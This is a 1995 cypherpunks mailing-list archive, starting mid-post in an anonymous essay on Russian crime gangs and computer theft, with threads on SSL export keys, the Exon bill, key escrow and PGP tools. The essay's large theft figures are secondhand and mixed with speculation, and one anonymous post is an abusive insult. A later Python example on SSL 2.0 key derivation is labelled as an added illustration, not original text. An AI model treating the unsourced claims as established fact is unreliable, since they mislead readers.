gangs operating in 17 U.S. cities in 14 states.  And I believe they've
identified 5,700 crime gangs in the former Soviet Union (which is up
_significantly_ from the 785 identified in 1991).

The Russian Ministry of Internal Affairs has estimated that gangs in
the former USSR employ about 100,000 _full-time_ members and an
estimated 3,000,000 part-timers.

These gangs' tentacles even by FBI estimates extend worldwide.  

The FBI (again) said that Russian gangs are entrenched in 29 foreign
countries and maintain contacts with nearly 100,000 criminal
enterprises worldwide ranging from illegal alien smuggling rings, and
drug gangs, through the child prostitution trade in China and
Southeast Asia.

If these enterprises are even somewhat loosely organized -- as Sinn
Fein was -- then they probably have access to good crypto.  Very good
crypto.  There can be no question of that.

The belief that this syndicate is composed solely of thugs is actually
contra-indicated.

The ISSA (Information Systems Security Association) has suggested that
these transnational gangs employ out of work or underemployed Russian
scientists, mathematicians and computer experts, who earn as _little_ as
$50 to $100 a month in their legitimate jobs because of inflation of
Russia's currency.  

The ISSA, has written that these specialist scientists penetrate the
Internet's global web of more than 60,000 computer networks.  Radicals
even suggest that this group is unique in having access to their own
constellations and communications systems -- but I personally think
that could only be civilian speculation.

This group is well organized, well financed and has a breadth and
depth of manpower that has never before been confronted.

The idea that those Russians who now winter at St. Tropez and who have
joined Monte Carlo cafe society must simply be very effective
"capitalists" doesn't float.  They are true natural talents who
understand the financial system and its networks -- personal networks,
financial networks, and silicon networks.

The former Russian bankers who managed the country's Gold & Oil Sales,
the ones who achieved understandings with De Beers, the ones who
managed Soviet international FOREX operations, and the ones who
visited with Armand Hammer, and learned from him personally, probably
had some sophistication in these matters.  

They've "dirtied" their hands with matters of Western finance, before.

If they or their lieutenants have donated their talents to these
enterprises, then Burwitz truly has his work cut out for him in
educating and training at the new FBI School.  

He's not just facing some Caspian caviar smugglers.  He's up against
some of the finest talent available.

>   Both students and teachers said there was a remarkable similarity,
>   however, in the use of evidence and investigatory tools among the
>   countries. Eastern Europeans are very familiar with the use of DNA
>   testing, for example, to identify suspects, although they don't
>   always have the money to do it, Burwitz said. "There are different
>   orders of laws between the U.S. and here," said a Czech student who
>   would identify himself only as Milan. "But essentially, we have the
>   same methods of investigation."

A far worse scenario can come forward than Milan's.

Let's suppose that the other side not only has complete familiarity
with your arsenal of investigatory and evidentiary tools, but also has
a superior knowledge of your own systems and their vulnerabilities, --
a knowledge that is superior to that you yourself possess.

Let's assume that while you were building your systems, hard and soft
systems, the other side has been studying them -- looking for holes
and vulnerabilities, and quietly documenting them.  

Taking an action, no different than your very own study of their
systems, actually.

Now let's suppose that you destroy the other side's system, and cause
economic collapse, social chaos, and national humiliation, while
preserving your own system.  An attempt at supremacy through "other
means".  Have you not invited a retaliatory attack?  

Some might suggest that you have ...

Not that Eastern syndicate elements might wish to see the disease
which has affected post-Soviet Russia propagate.  A share in the 
taste of it.  They're too busy tasting what was promised to them 
by the Voice of America and living the life of a model 
capitalist -- one of the characters from Dynasty.

Groups such as the Congress of Russian Communities, and the decorated
Afghan war hero, Gen. Alexander Lebed -- who Yeltsin asked to resign
as commander of the 14th Russian Army following Lebed's criticism of
the Kremlin -- certainly would have nothing to gain by retaliating in
kind to the disease introduced into the Motherland.

Striking at the state's head, clearly didn't solve this problem.
The essential "talent" has simply re-organized into a new structure,
one which is not under any central command or control hierarchy or
authority.  Simple chaotic self-interests organizing and emerging.

Certainly upcoming Presidential Elections in June and November won't
play a part in this.

"I treat the word democracy with respect," forty-five year-old Lebed 
told the newspaper Segodnya recently.  "But I am sure democracy will 
not be established within my lifetime.  Our country is such that 
democracy will have to be built by authoritarian methods."

Luckily, for all of us, President Boris Yeltsin is firmly in control.  

He has little to fear.  Some people might be looking for a parallel to
MacArthur / Truman, in this instance.  But I personally wouldn't hang
my hat on that hope.

Lebed certainly wouldn't subscribe to Douglas MacArthur's statement
after he was relieved of command in the Far East, in 1951, when he
said, "I find in existence a new and heretofore unknown and dangerous
concept that the members of our armed forces owe primary allegiance or
loyalty to those who temporarily exercise the authority of the
Executive Branch of the Government rather than to the country and its
constitution which they swore to defend.  No proposition could be more
dangerous."

The April/May ISSA Password had this to say.

     "Unless something is done by law enforcement and private security
     agencies on a global scale to deter these Russian criminals, they
     will be looting banks, corporations, and government agencies of
     billions of dollars -- without using guns or the traditional
     methods.  Their modus operandi will be to rely solely on computer
     keyboards and the Internet.

     In an article published in the February 6, 1995, issue of the
     "Washington Times," international security expert and former
     Times editor-in-chief Arnaud de Borchgrave said: (sic)
     "Cyberspace detectives" report that financial thefts by Russian
     organized crime hackers on the Internet last year exceeded an
     estimated $5 Billion in the United States alone.

     Furthermore, he reports that about $300 million in untraceable
     computer transfers have vanished during the past two months
     (Jan/Feb 95) from banks and securities firms based on the East
     and West coasts of the U.S.

I think in February (1995), the CIA and the National Security Agency
(NSA) warned in a joint security report that, "The security of
information systems and networks is the major security challenge of
this decade and possibly the next century."

Burwitz faces a challenge.  If you face talent, information, money,
and organization, while you can't even get your ducks lined up, if you
can't maintain team discipline, then you might pretty well surrender.

You've already ceded much of the high ground, as Burwitz can probably
attest.

To prevent the accusation of being a "red-baiter" perhaps, I might say
that Mao Tse Tung, himself once noted:

   "Some people are intelligent in knowing themselves but stupid in
   knowing their opponents, and others the other way round; neither
   kind can solve the problem of learning and applying the laws of war."

And to close, a return to de Borchgrave, who according to ISSA
Password, wrote:

     "And it's not juvenile hackers who are committing these crimes.
     "Those doing it for the sheer pleasure of causing chaos on the
     net -- usually very young super-hackers -- have rapidly become
     the minority," one cyber detective told de Borchgrave.
     "Transnational crime gangs operating on several continents at
     almost the speed of light are now the main problems."



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@boston.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 6 Dec 95 17:25:52 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <199512070125.UAA16598@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199512062229.RAA16714@universe.digex.net>,
Scott Brickner <sjb@universe.digex.net> wrote:
> 
> I agree.  It does bring to mind an idea, though.  Netscape builds an
> exportable system by choosing a random 128 bit number and then just
> including 88 bits of it in plaintext.
> 
> This means one of two things.  Either there's a field which holds the
> "key", but the export version stores 88 bits plain + 40 bits cipher,
> and knows this structure, or there's a field which holds the 128 bit
> enciphered key, and a second field which holds the 88 bits of plaintext
> key.
> 

It's the former (in SSL v2.0).

I looked into this, because the former version can be vulnerable to
related-key attacks, if not done right.  SSL v2.0 does it right.
(In particular, SSL v2.0 hashes both the 88 bit salt + 40 bit secret
to get all the cipher keys.)

> 
> In the former, the patch would be more significant, but still possible.
> You'd disable the "write the plain" part and extend the "decode the
> cipher" part to decode all 128 bits --- probably just a loop test.
> 

(And you'd have to change the cipher type from RC4-40 to RC4-128.)

Or write a local proxy to convert from RC4-40-salted to RC4-128.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMZCbSoZzwIn1bdtAQF9xAGAqkg5VzChucF3FasK2pYVxg1D5F3lsnSP
CFWsp+MbXKqTe71iznBvtg246xWPLohe
=XM3W
-----END PGP SIGNATURE-----
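
The point made in the message above (using the 88 clear bits plus 40 secret bits directly as a cipher key versus hashing them first), as an added example that is not part of the original post or of Netscape's code. The hashed form follows the SSL 2.0 specification's KEY-MATERIAL formula for the RC4 cipher kinds; the function names and all byte values are constructed for illustration.

```python
import hashlib

SALT_LEN, SECRET_LEN = 11, 5   # 88 clear bits + 40 secret bits = 128-bit MASTER-KEY


def master_key(clear_salt: bytes, secret: bytes) -> bytes:
    """MASTER-KEY = clear part (sent in plaintext) || secret part (sent RSA-encrypted)."""
    if len(clear_salt) != SALT_LEN or len(secret) != SECRET_LEN:
        raise ValueError("export MASTER-KEY is 11 clear bytes + 5 secret bytes")
    return clear_salt + secret


def naive_keys(mk: bytes):
    """Hypothetical weak design: the 128-bit value is used directly as the RC4 key."""
    return mk, mk


def sslv2_keys(mk: bytes, challenge: bytes, connection_id: bytes):
    """SSL 2.0 derivation: every key byte depends on the salt AND the secret.

    KEY-MATERIAL-n = MD5(MASTER-KEY || ascii digit n || CHALLENGE || CONNECTION-ID)
    """
    km0 = hashlib.md5(mk + b"0" + challenge + connection_id).digest()
    km1 = hashlib.md5(mk + b"1" + challenge + connection_id).digest()
    return km0, km1   # (client-read key, client-write key)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def bits_set(data: bytes) -> int:
    return sum(bin(byte).count("1") for byte in data)


def compare_sessions() -> dict:
    """Two sessions share the 40-bit secret; their public salts differ in one bit."""
    secret = bytes.fromhex("a1b2c3d4e5")                 # constructed
    salt_a = bytes.fromhex("00112233445566778899aa")     # constructed
    salt_b = bytes.fromhex("00112233445566778899ab")     # constructed, 1 bit flipped
    challenge = bytes(range(16))                         # constructed public nonce
    connection_id = bytes(range(16, 32))                 # constructed public nonce

    mk_a, mk_b = master_key(salt_a, secret), master_key(salt_b, secret)

    # What an eavesdropper can compute from the plaintext salts alone.
    public_delta = xor(salt_a, salt_b) + bytes(SECRET_LEN)

    naive_delta = xor(naive_keys(mk_a)[0], naive_keys(mk_b)[0])
    read_a, write_a = sslv2_keys(mk_a, challenge, connection_id)
    read_b, _ = sslv2_keys(mk_b, challenge, connection_id)
    hashed_delta = xor(read_a, read_b)

    return {
        # Direct use: the two cipher keys are related by a publicly known XOR.
        "naive_bits_differing": bits_set(naive_delta),
        "naive_xor_is_public": naive_delta == public_delta,
        # Hashed: the key difference is unrelated to the salt difference.
        "hashed_bits_differing": bits_set(hashed_delta),
        "hashed_xor_is_public": hashed_delta == public_delta,
        "directions_use_distinct_keys": read_a != write_a,
        "key_len": len(read_a),
    }


if __name__ == "__main__":
    for name, value in compare_sessions().items():
        print(f"{name}: {value}")
```

Hashing removes the known relation between keys; it does not add entropy, so the export cipher still rests on 40 secret bits.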




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KHARY PENEBAKER <kharyp@earthlink.net>
Date: Wed, 6 Dec 95 18:29:57 PST
To: cypherpunks@toad.com
Subject: list
Message-ID: <199512070228.SAA19607@iceland.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


put me on the list






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 6 Dec 95 12:30:13 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <aceb12f4150210045ba8@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951206202150.5522A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    well, there goes the neighborhood.

    guess I better clean up my www front page which meets the Exon rules on 
indecency, pisses on ITAR, and is probably seditious as well. might as 
well get a start on it before the eager beavers hemorrhage!

    the House contingent were all of the Exon persuasion to begin with and
subject to threats by the Christian Right. The real test is whether the
full House will sign on --a real test on Newt's professed 'Freedom of the
Net' policy!  If Newt keeps his resolve, can he again raise the 424-4
margin he had for the Wyden amendment?  Tune in for the exciting 
fireworks next week or so for House action....  yeah, right!

    and as a last resort, Clinton has vowed to veto the bill for two 
reasons: the open season privileges for big business to consolidate all 
telecommunications into a few empires, and the lack of regulation to 
control same.  Maybe now that Hillary is not out front, maybe Bill will 
find his balls, or maybe he will waffle again....

-------

On Wed, 6 Dec 1995, Timothy C. May wrote:

> 
> I just heard (12:15 EST) that the House has adopted language similar to the
> original Exon-Coates language in the Senate (as opposed to the White
> language, which was less restrictive in that it dealt with material that
> was "harmful" to children, interpreted to mean child porn).
> 
> It looks like Internet Service Providers will soon be held liable for
> "indecent material" passed by their systems. I would expect most ISPs will
> drop the alt.binaries.* newsgroups as a first step, and maybe other groups
> as well.
> 
> (Controlling Web page accesses is a much tougher problem, of course. so I
> wouldn't expect much action on this at first.)
> 
> By the way, I recently discovered a new twist on "age credentials": the use
> of credit cards to prove age. One image site is asking for a "valid credit
> card number" to be given...not to use for charges, but just to do a quick
> verification (they claim a few minutes or less) that the card is valid and
> in the name of the person accessing their site.
> 
> Some obvious security issue. An interesting twist, though.
> 
> If the Exon Bill really does go into effect, and age limits on access are
> imposed, I'll be looking for what we've always joked about: the
> "Information Superhighway Driver's License."
> 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Wed, 6 Dec 95 20:51:12 PST
To: Bill Humphries <Bill.Humphries@msn.fullfeed.com>
Subject: Re: Responding to Exon -- technology is not enough
In-Reply-To: <v01530501acebcc1c5522@[199.184.183.25]>
Message-ID: <Pine.SUN.3.91.951206203135.13303C-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


[This document was Exonized at The Exon-Hyde Center for Thought Cleansing.]

On Wed, 6 Dec 1995, Bill Humphries wrote:

> Fine for the tiny subset of Net users who understand crypto enough to use
> it on a daily basis. I'm not one of people either. This crypto isn't user
> friendly stuff. Before you propose such a solution, better make sure
> people can use this stuff.

You're right here, definitely. While I'm not volunteering, I think
something could be written, such as an encrypted UUCP transfer system, and
a better premail. 

PGP is reasonably user friendly, if you have any kind of memory at all. It
isn't, of course, user friendly if you have to save your message to a
file, shell, encrypt it, exit the shell, load it back in, and send it. I
think that there is the major problem with PGP. I *know* that kind of
thing is a problem with chaining anon mailers, unless you have installed
an application such as Premail. 

I think that we'll eventually see applications such as Eudora pop up with 
PGP support, directly or indirectly.

> >Anyone wish to comment on the prospect of a double blind server, set
> >outside U.S. borders, that can act as an interface to the rest of the
> >world, perhaps encrypting or stego'ing the data transferred between it and
> >the user? Basically, an anonymous remailer that acts as a cross between
> >an NNTP, POP3, and SMTP servers.
> 
> How are you going to pitch this technology to all the people with AOL and
> Microsoft Network accounts who barely understand the net? These are the
> people who need exposure to all the uncensored expression they can get.

I was thinking more along the lines of an offline message packet that the
server creates, encrypts, chains through anon mailers with a response
block, and sends to you. You get it, run it through a filter, run your
offline reader, such as Yarn, write your replies, run another program to
get an encrypted, reply-blocked, ready to send packet, and drop it right
into the SMTP port. I don't know if the AOL and MSN software would even
allow this without difficulty, as I haven't seen it. 

I just used it as an example, though. I'm sure there are much better ideas
out there. 

> Instead of figuring out how to build a new treehouse that excludes Exon and
> Hyde, how about fighting the damned bill in the courts?

Here's a chain of events:

1) Congress gets their wish, and it all passes.
2) President signs into law.
3) ISPs:
   a) Shut down, which isn't really likely,
   b) Severely restrict service, or
   c) Tell the government where to shove it (and watch themselves 
      promptly prosecuted). After one or two ISPs are busted, the rest
      will "fall in line."
4) Someone gets caught writing "<EXON>" in E-MAIL or on USENET, or 
   committing some other form of thought-crime, and is prosecuted.
5) While this person is fighting his or her impending exonization and 
   cleansing of dirty thoughts, the rest of us have our free speech 
   severely restricted. Would I be wrong in saying that it would take a 
   long time, and a lot of money to fight this up to the Supreme Court?

Then we risk the Supreme Court ruling in favor of Congress, however
unlikely that may seem. The S.C. could just as easily tell us to "exon 
off" to keep the world safe for mentally impaired children that, while 
smart enough to operate a computer and go looking for pornography, are 
damaged by it and/or the word "exon."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 6 Dec 95 21:36:55 PST
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNYMq-0008zoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:28 PM 12/6/95 -0600, you wrote:
>
>Bill Stewart writes:
> > I had interpreted the suggestion differently - rather than a system with 
> > user-accessible crypto hooks, the manufacturer could ship a binary patch
> > upgrade for US customers to install.  The internal design would presumably
> > have crypto hooks (i.e. subroutine calls); they can't ban that.
>
>No, they can't *ban* it, but there's no reason to suspect that they
>won't revoke the export license after the scheme becomes clear.  And
>of course the patch itself would not be exportable.  If there's a
>"wink wink nudge nudge" implication that the patch would make its way
>overseas, I don't understand why that's really any more likely than
>the US-only version getting out.

It isn't that it's "more" likely.  It's probably JUST AS likely.  But
remember, the goal is to allow the US company to actually MAKE MONEY, not to
bootleg its products.  The system I've described would be intended to allow
a manufacturer to continue to sell its exportable product legally.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mary Rose <m.landicho@biology.bbk.ac.uk>
Date: Wed, 6 Dec 95 14:06:42 PST
To: owner-cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <ECS9512062222A@ccs.bbk.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Wed, 6 Dec 95 14:50:17 PST
To: cypherpunks@toad.com
Subject: Re: latest librand source now av
Message-ID: <9512062243.AA04215@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


In .cypherpunks, Matt Blaze <mab@research.att.com> writes:
>[Sorry if this is a duplicate; my machine had a bogus sendmail.cf
>when I first sent this.]
>
>Source code for the latest version of librand (a random
>number package based on event interval variations) for
>Unix-like machines is now available in:
>  ftp://ftp.research.att.com/dist/mab/librand.shar
>
>There are no restrictions on use or distribution of this
>code, which was written by Matt Blaze, Jack Lacy, and
>Don Mitchell.
>
>-matt
>

why the FUCK would anyone want to use random number code from at&t,
(and mister netscape GAK apologist himself)? this the code that was
broken by french student for christs sakes.

and tell us the truth about the restrictions, next time, bozo.

asshole.

cypherpunks write code themselves!!!
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 19:55:13 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <82563.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Bill Stewart <stewarts@ix.netcom.com>  writes:
> Maybe this is just an artifact of Pat's wording, but this sounds
> like there may be classified court orders other than FISA?

You are reading more into my writing than I intended. I know
of no other classified court than FISA.

But A. Michael Froomkin noted that my best friend Geoff's slide
said "(e.g. FISA)" and asked, since you used "e.g." what are the
others? Geoff mumbled and rambled. I took it as a no comment.
There were a bunch of lawyers there, including Sobel from EPIC,
Danny W from CDT, etc. Perhaps they know of more than I do,
I'm just a techie.

>> Plus, since you have to be a US citizen to get a clearance,
>>   how can there be approved foreign escrow agents?
> By deals with the foreign governments, presumably reciprocal.

Deals are, of course, possible. But right now, a clearance means
US Citizen. AFAIK, the only legal discrimination allowed in employment
ads is "US Citizenship required" which is code for "clearance required"

>>And the usual, why in hell would a competent spy use
>>  crypto escrowed in the US?
> Competent spies appear to be a surprisingly small fraction of
> even government-employed espionage personnel

OK, I'll grant you that there aren't many of them. Still, why
you don't address my question: why use it if you have an IQ above
air temperature? Your traffic and low visibility ideas have merit,
but why open up to FISA?

> And sometimes you're just stuck on the Beltway and have to use your
> car phone to say you'll be a bit late dropping off the secret plans.
You left out the :-)
Actually, you'd have appreciated the November DC-cypherpunks meeting, we
spent a couple hours driving around, mapping spook facilities.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 6 Dec 95 14:30:30 PST
To: cypherpunks@toad.com
Subject: Civilizing Cyberspace (book note)
Message-ID: <199512062231.XAA27734@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Forward:

Steven E. Miller, a member of the national board of
directors of Computer Professionals for Social
Responsibility, has published a new book, *Civilizing
Cyberspace: Policy, Power and the Information
Superhighway* (Addison Wesley, 1995, 413 pages).

This is the best book I have seen on the public policy
debates surrounding the information superhighway. It
covers all aspects of this debate, including democracy,
citizenship, community networks, privacy, intellectual
property, competing models of the NII, universal service,
equity, freedom of expression, protecting the public
interest, encryption, and so on.

Highly recommended for anyone interested in this subject,
or for use as a text in classes.


Gary Chapman, Coordinator, The 21st Century Project
LBJ School of Public Affairs, University of Texas, Austin







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Wed, 6 Dec 95 23:47:12 PST
To: <cypherpunks@toad.com>
Subject: Persona PCMCIA URL?
Message-ID: <v03003f0aacec4bdd3ac9@[129.46.82.94]>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have a URL for data sheets on the Persona cards?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 6 Dec 95 21:21:14 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: [FYI] FBI Training Eastern European Police
In-Reply-To: <199512070422.UAA22589@jobe.shell.portal.com>
Message-ID: <199512070516.AAA02188@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> >   FBI School Teaches New Tricks to Old Enemies

I've heard stories that several of these programs had unexpected
problems. To wit -- some of the students were showing up from the third
world with severe medical problems; expensive ones, including the
obvious -- AIDS.

Result -- Lots of flak back & forth from field to TPTB.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Wed, 6 Dec 95 21:22:11 PST
To: cypherpunks@toad.com
Subject: secure listservs?
Message-ID: <m0tNYlk-001Bo4C@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Looking for some secure listserv software, preferably something
that will automatically generate purpose-specific PGP keys for
each user and one for the listserv.  Each user encodes mail for
the list with the list's public key, signing it with their own
private key (either the purpose specific one, or their regular
key).  Each user receives mail from the listserv encoded with
the corresponding public key.  That way each user has a choice
of using their published key (for convenience) or their purpose-
specific key, possibly in conjunction with an anonymous remailer,
to ensure the segmentation of these communications from others
that they may engage in.

Anyone seen/built anything like this ?
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KLEMEN RAMOVES <KLEMEN@lj-oz.sik.si>
Date: Wed, 6 Dec 95 16:14:53 PST
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <01HYIAGKS0OI0006XT@arnes.si>
MIME-Version: 1.0
Content-Type: text/plain


plz..unsubscribe me..
klemen@lj

klemen@Lj
-oz.sik.si

						KleMeN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Thu, 7 Dec 95 05:26:14 PST
To: cypherpunks@toad.com
Subject: (Fwd) General release of Open Encryptor interface for PGP
Message-ID: <199512071327.HAA06167@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
Priority:      normal
Date:          Fri, 8 Dec 1995 00:08:30 +1200
Reply-to:      Pegasus Mail Announcments <PM-NEWS@UA1VM.UA.EDU>
From:          John Navas <JNavas@aimnet.com>
Organization:  The Navas Group, Dublin, CA, USA
Subject:       General release of Open Encryptor interface for PGP
To:            Multiple recipients of list PM-NEWS <PM-NEWS@UA1VM.UA.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

Release 1.0 of my Open Encryptor interface for PGP has been posted on
my anonymous FTP server <ftp://ftp.aimnet.com/users/jnavas/winpmail/>

PGP information is available at http://www.mantis.co.uk/pgp/pgp.html
The MIT distribution of PGP is at ftp://net-dist.mit.edu:/pub/PGP/
ViaCrypt (commercial version of PGP) is at http://www.viacrypt.com/
The International PGP Home Page is at http://www.ifi.uio.no/~staalesc/PGP/

Release notes for PGP Open Encryptor Interface version 1.0:

1.  Only public key cryptography is supported in this release, NOT
    conventional cryptography.
2.  Basic Key Management functions are implemented:
    a.  To add a public key block contained in a message to your Key
        Ring, either Open or select the message before invoking Key
        Management.  (If a public key block is placed in a digitally
        signed and/or encrypted message, it will not be recognized
        automatically by this interface.)  You can also invoke Key
        Management and paste a public key block into the dialog from
        the Windows Clipboard (which does of course work with a
        signed and/or encrypted message).
    b.  You can check to see if a given email address is on your Key
        Ring -- just paste the email address (without the name) into
        the dialog box control.
    No other Key Management functions are implemented at this time.
3.  Both digital signing and signature verification are implemented:
    a.  If a secret pass phrase is needed (and not provided in
        the PGPPASS environment variable), it MUST be provided each
        time in the WinPMail Password field.
    b.  Please note that signature verification is a strictly *manual*
        process -- you must explicitly use the WinPMail menu.  This is
        a characteristic of WinPMail, NOT this interface.
4.  When encrypting:
    a.  The recipient email address (e.g., jnavas@navasgrp.com) will
        normally select the appropriate public key automatically, but
        it may be overridden with an entry in the WinPMail Password
        field.
    b.  Your recipient may need to add also-known-as entries to
        his/her public key to ensure that you match on various forms
        of email addresses (e.g., also known as
        jnavas@mailhost.aimnet.com).
    c.  The WinPMail Password will NOT be used for encryption of a
        digitally signed message, since the Password is then reserved
        for the secret pass phrase (whether one is needed or not).
5.  If encryption or signing fails (e.g., because the recipient is not
    on your key ring, or because your secret pass phrase was
    incorrect), an empty message will be sent.  This is a
    characteristic of WinPMail, NOT this interface.
6.  Copies to self of encrypted and/or signed messages are NOT
    encrypted and/or signed.  This is a characteristic of WinPMail, NOT
    this interface.  (If you want an encrypted and/or signed copy, BCC
    yourself.)
7.  It is normally NOT possible for you to decrypt a message that you
    have encrypted for someone else (since you do not have that
    person's secret key).  However, you can establish a master
    decryption key by setting the PGPJNKEY environment variable to a
    string needed to select the appropriate public key (yours or not).
    TEST FOR PROPER OPERATION (BY DECRYPTING A MESSAGE ENCRYPTED FOR
    SOMEONE ELSE) BEFORE YOU DEPEND ON IT!  It may be a good idea to
    add an also-known-as alias just for this purpose.
8.  The Cancel button does not work on the Decryption dialog box.
    This is a characteristic of WinPMail, NOT this interface.
9.  When you do a Find on a folder, WinPMail puts up the Decryption key
    dialog for every encrypted message, even when you are only
    searching headers, which can make the process painful.  This is a
    characteristic of WinPMail, NOT this interface.
10. Attachments to encrypted messages are NOT supported.  (Outgoing
    attachments to encrypted messages are NOT encrypted, and incoming
    binary attachments are corrupted.)  This is a characteristic of
    WinPMail, NOT this interface.
11. Windows 3.10, Windows for Workgroups 3.11, and Windows 95 are
    supported.  Windows NT and OS/2 have NOT been tested and are NOT
    currently supported.  USE THEM AT YOUR OWN RISK.
12. MIT PGP 2.6.2 is supported in this release.  Other versions of PGP
    have NOT been tested and are NOT currently supported.  ViaCrypt PGP
    has NOT been tested for this release, but is expected to be
    supported in a subsequent release.  USE THEM AT YOUR OWN RISK.
13. Reassembly and decryption of multiple-part PGP messages is NOT
    supported.
14. PGP messages sent by other WinPMail Open Encryptor PGP interfaces
    may not trigger this interface.  (Other PGP sources should not be a
    problem.)  This is a characteristic of WinPMail, NOT this
    interface.

To install the PGP Open Encryptor Interface:

1.  UnZIP in a subdirectory of FORMS called PGPJN
    (e.g., \PMAIL\FORMS\PGPJN).
2.  Copy the PGPJNP.FFF file up to your WinPMail directory (e.g.,
    \PMAIL).
3.  Make sure that PGP is installed correctly, and that the PGPPATH
    environment variable is set correctly.  (If PGPPATH is set, PGP
    does not need to be in your PATH.)
4.  Encrypt and send a message to yourself to test operation.

John Navas <JNavas@NavasGrp.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMbC7O5ya4p8vxAtAQHO7wH/atOJoEbrUX2G/Zzr3jZCvblQZXBWzlv6
KTNraPxaui8jtw83U+pZYWV/jNVJ48Fw4Fy6XeQrtdzXJsi0tKJZtg==
=jZvU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Thu, 7 Dec 95 05:33:57 PST
To: cypherpunks@toad.com
Subject: (Fwd) General release of Open Encryptor interface for PGP
Message-ID: <309290F7177@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


	I believe this may be of interest to those on this list.
	Pegasus is available at 
<ftp://risc.ua.edu/pub/network/pegasus/winpm223.zip>

	Enjoy.

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Expertise in one field does not carry over into other fields.  But
experts often think so.  The narrower their field of knowledge the
more likely they are to think so.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Thu, 7 Dec 95 07:55:22 PST
To: pfarrell@netcom.com
Subject: NIST GAK, Escrow Agent Criteria available
Message-ID: <199512071554.HAA11631@netcom3.netcom.com>
MIME-Version: 1.0
